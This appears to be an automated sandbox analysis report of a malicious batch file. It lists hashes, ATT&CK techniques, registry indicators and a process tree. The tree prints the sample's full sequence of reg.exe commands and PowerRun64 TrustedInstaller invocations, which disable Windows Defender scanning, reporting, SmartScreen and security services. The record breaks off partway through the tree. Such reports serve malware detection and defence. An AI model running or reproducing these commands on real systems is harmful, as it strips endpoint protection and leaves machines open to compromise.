13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-12-2024 14:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$_63_/bn1.bat
Size

6KB
MD5

18ed180c0b36d0e5bfee84806a19537c
SHA1

e7c9b67bdd5ae63666960db92bb98fdf43e7b875
SHA256

d388317f65ec52d46fc68548e60320758a6b512966c1d72314875dc29e459528
SHA512

cf6e82e48f9e7b11a4be4ebd606af59909d0a372fd694435e747279771c9d9fac8bfeaf9fedbc4c37dd0fc8e23e77c6b619ac084f230a207f9f96d0dc17b5f1b
SSDEEP

192:5qUEGA6oh/HbzBBzKF6gF8XM9LjZApFpQjTtf:AK

Score

10^/10

defense_evasion evasion execution trojan

Malware Config

Signatures

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe

Modifies Security services 2 TTPs 10 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Logs\CBS\CbsPersist_20241204140031.cab	makecab.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
564	powershell.exe
852	powershell.exe
2904	powershell.exe

Modifies data under HKEY_USERS 48 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2900	PowerRun64.exe
2900	PowerRun64.exe
2936	PowerRun64.exe
2936	PowerRun64.exe
2892	PowerRun64.exe
2892	PowerRun64.exe
1532	PowerRun64.exe
1532	PowerRun64.exe
1752	PowerRun64.exe
1752	PowerRun64.exe
1428	PowerRun64.exe
1428	PowerRun64.exe
1128	PowerRun64.exe
1128	PowerRun64.exe
2336	PowerRun64.exe
2336	PowerRun64.exe
380	PowerRun64.exe
380	PowerRun64.exe
1048	PowerRun64.exe
1048	PowerRun64.exe
1552	PowerRun64.exe
1552	PowerRun64.exe
1984	PowerRun64.exe
1984	PowerRun64.exe
2164	PowerRun64.exe
2164	PowerRun64.exe
2040	PowerRun64.exe
2040	PowerRun64.exe
1968	PowerRun64.exe
1968	PowerRun64.exe
2708	PowerRun64.exe
2708	PowerRun64.exe
2904	PowerRun64.exe
2904	PowerRun64.exe
2988	PowerRun64.exe
2988	PowerRun64.exe
1652	PowerRun64.exe
1652	PowerRun64.exe
1816	PowerRun64.exe
1816	PowerRun64.exe
2356	PowerRun64.exe
2356	PowerRun64.exe
2604	PowerRun64.exe
2604	PowerRun64.exe
1928	PowerRun64.exe
1928	PowerRun64.exe
1724	PowerRun64.exe
1724	PowerRun64.exe
2824	PowerRun64.exe
2824	PowerRun64.exe
2360	PowerRun64.exe
2360	PowerRun64.exe
2144	PowerRun64.exe
2144	PowerRun64.exe
2152	PowerRun64.exe
2152	PowerRun64.exe
2952	PowerRun64.exe
2952	PowerRun64.exe
3040	PowerRun64.exe
3040	PowerRun64.exe
2940	PowerRun64.exe
2940	PowerRun64.exe
564	powershell.exe
852	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2900	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2900	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2900	PowerRun64.exe
Token: 0	2900	PowerRun64.exe
Token: SeDebugPrivilege	2936	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2936	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2936	PowerRun64.exe
Token: SeDebugPrivilege	2892	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2892	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2892	PowerRun64.exe
Token: 0	2892	PowerRun64.exe
Token: SeDebugPrivilege	1532	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1532	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1532	PowerRun64.exe
Token: SeDebugPrivilege	1752	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1752	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1752	PowerRun64.exe
Token: 0	1752	PowerRun64.exe
Token: SeDebugPrivilege	1128	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1128	PowerRun64.exe
Token: SeDebugPrivilege	1428	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1428	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1428	PowerRun64.exe
Token: 0	1428	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1128	PowerRun64.exe
Token: SeDebugPrivilege	2336	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2336	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2336	PowerRun64.exe
Token: SeDebugPrivilege	380	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	380	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	380	PowerRun64.exe
Token: 0	380	PowerRun64.exe
Token: SeDebugPrivilege	1048	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1048	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1048	PowerRun64.exe
Token: SeDebugPrivilege	1552	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1552	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1552	PowerRun64.exe
Token: 0	1552	PowerRun64.exe
Token: SeDebugPrivilege	1984	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1984	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1984	PowerRun64.exe
Token: SeDebugPrivilege	2164	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2164	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2164	PowerRun64.exe
Token: 0	2164	PowerRun64.exe
Token: SeDebugPrivilege	2040	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2040	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2040	PowerRun64.exe
Token: SeDebugPrivilege	1968	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1968	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1968	PowerRun64.exe
Token: SeDebugPrivilege	2708	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2708	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2708	PowerRun64.exe
Token: 0	2708	PowerRun64.exe
Token: SeDebugPrivilege	2904	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2904	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2904	PowerRun64.exe
Token: SeDebugPrivilege	2988	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2988	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2988	PowerRun64.exe
Token: 0	2988	PowerRun64.exe
Token: SeDebugPrivilege	1652	PowerRun64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2092 wrote to memory of 2956	2092	cmd.exe	32
PID 2092 wrote to memory of 2956	2092	cmd.exe	32
PID 2092 wrote to memory of 2956	2092	cmd.exe	32
PID 2092 wrote to memory of 3032	2092	cmd.exe	33
PID 2092 wrote to memory of 3032	2092	cmd.exe	33
PID 2092 wrote to memory of 3032	2092	cmd.exe	33
PID 2092 wrote to memory of 3040	2092	cmd.exe	34
PID 2092 wrote to memory of 3040	2092	cmd.exe	34
PID 2092 wrote to memory of 3040	2092	cmd.exe	34
PID 2092 wrote to memory of 3056	2092	cmd.exe	35
PID 2092 wrote to memory of 3056	2092	cmd.exe	35
PID 2092 wrote to memory of 3056	2092	cmd.exe	35
PID 2092 wrote to memory of 2300	2092	cmd.exe	36
PID 2092 wrote to memory of 2300	2092	cmd.exe	36
PID 2092 wrote to memory of 2300	2092	cmd.exe	36
PID 2092 wrote to memory of 2244	2092	cmd.exe	37
PID 2092 wrote to memory of 2244	2092	cmd.exe	37
PID 2092 wrote to memory of 2244	2092	cmd.exe	37
PID 2092 wrote to memory of 2392	2092	cmd.exe	38
PID 2092 wrote to memory of 2392	2092	cmd.exe	38
PID 2092 wrote to memory of 2392	2092	cmd.exe	38
PID 2092 wrote to memory of 552	2092	cmd.exe	39
PID 2092 wrote to memory of 552	2092	cmd.exe	39
PID 2092 wrote to memory of 552	2092	cmd.exe	39
PID 2092 wrote to memory of 2072	2092	cmd.exe	40
PID 2092 wrote to memory of 2072	2092	cmd.exe	40
PID 2092 wrote to memory of 2072	2092	cmd.exe	40
PID 2092 wrote to memory of 1484	2092	cmd.exe	41
PID 2092 wrote to memory of 1484	2092	cmd.exe	41
PID 2092 wrote to memory of 1484	2092	cmd.exe	41
PID 2092 wrote to memory of 804	2092	cmd.exe	42
PID 2092 wrote to memory of 804	2092	cmd.exe	42
PID 2092 wrote to memory of 804	2092	cmd.exe	42
PID 2092 wrote to memory of 2000	2092	cmd.exe	43
PID 2092 wrote to memory of 2000	2092	cmd.exe	43
PID 2092 wrote to memory of 2000	2092	cmd.exe	43
PID 2092 wrote to memory of 1972	2092	cmd.exe	44
PID 2092 wrote to memory of 1972	2092	cmd.exe	44
PID 2092 wrote to memory of 1972	2092	cmd.exe	44
PID 2092 wrote to memory of 2248	2092	cmd.exe	45
PID 2092 wrote to memory of 2248	2092	cmd.exe	45
PID 2092 wrote to memory of 2248	2092	cmd.exe	45
PID 2092 wrote to memory of 2108	2092	cmd.exe	46
PID 2092 wrote to memory of 2108	2092	cmd.exe	46
PID 2092 wrote to memory of 2108	2092	cmd.exe	46
PID 2092 wrote to memory of 1688	2092	cmd.exe	47
PID 2092 wrote to memory of 1688	2092	cmd.exe	47
PID 2092 wrote to memory of 1688	2092	cmd.exe	47
PID 2092 wrote to memory of 2980	2092	cmd.exe	48
PID 2092 wrote to memory of 2980	2092	cmd.exe	48
PID 2092 wrote to memory of 2980	2092	cmd.exe	48
PID 2092 wrote to memory of 588	2092	cmd.exe	49
PID 2092 wrote to memory of 588	2092	cmd.exe	49
PID 2092 wrote to memory of 588	2092	cmd.exe	49
PID 2092 wrote to memory of 2976	2092	cmd.exe	50
PID 2092 wrote to memory of 2976	2092	cmd.exe	50
PID 2092 wrote to memory of 2976	2092	cmd.exe	50
PID 2092 wrote to memory of 2452	2092	cmd.exe	51
PID 2092 wrote to memory of 2452	2092	cmd.exe	51
PID 2092 wrote to memory of 2452	2092	cmd.exe	51
PID 2092 wrote to memory of 2376	2092	cmd.exe	52
PID 2092 wrote to memory of 2376	2092	cmd.exe	52
PID 2092 wrote to memory of 2376	2092	cmd.exe	52
PID 2092 wrote to memory of 2176	2092	cmd.exe	53

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\$_63_\bn1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2092
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
  2⤵
  PID:2956
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
  2⤵
  PID:3032
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
  2⤵
  PID:3040
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
  2⤵
  PID:3056
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
  2⤵
  PID:2300
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
  2⤵
  PID:2244
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
  2⤵
  PID:2392
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
  2⤵
  PID:552
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
  2⤵
  PID:2072
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
  2⤵
  PID:1484
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
  2⤵
  PID:804
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
  2⤵
  PID:2000
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
  2⤵
  PID:1972
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
  2⤵
  PID:2248
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
  2⤵
  PID:2108
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
  2⤵
  PID:1688
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
  2⤵
  PID:2980
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
  2⤵
  PID:588
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
  2⤵
  PID:2976
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
  2⤵
  PID:2452
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
  2⤵
  PID:2376
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
  2⤵
  PID:2176
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
  2⤵
  PID:2760
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
  2⤵
  PID:2296
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
  2⤵
  PID:564
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
  2⤵
  PID:2764
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
  2⤵
  PID:2908
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
  2⤵
  PID:2932
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
  2⤵
  PID:2888
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
  2⤵
  PID:2912
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender notification settings
  PID:2944
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender notification settings
  PID:2884
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
  2⤵
  PID:2992
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2900
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2936
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2236
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:336
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2892
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
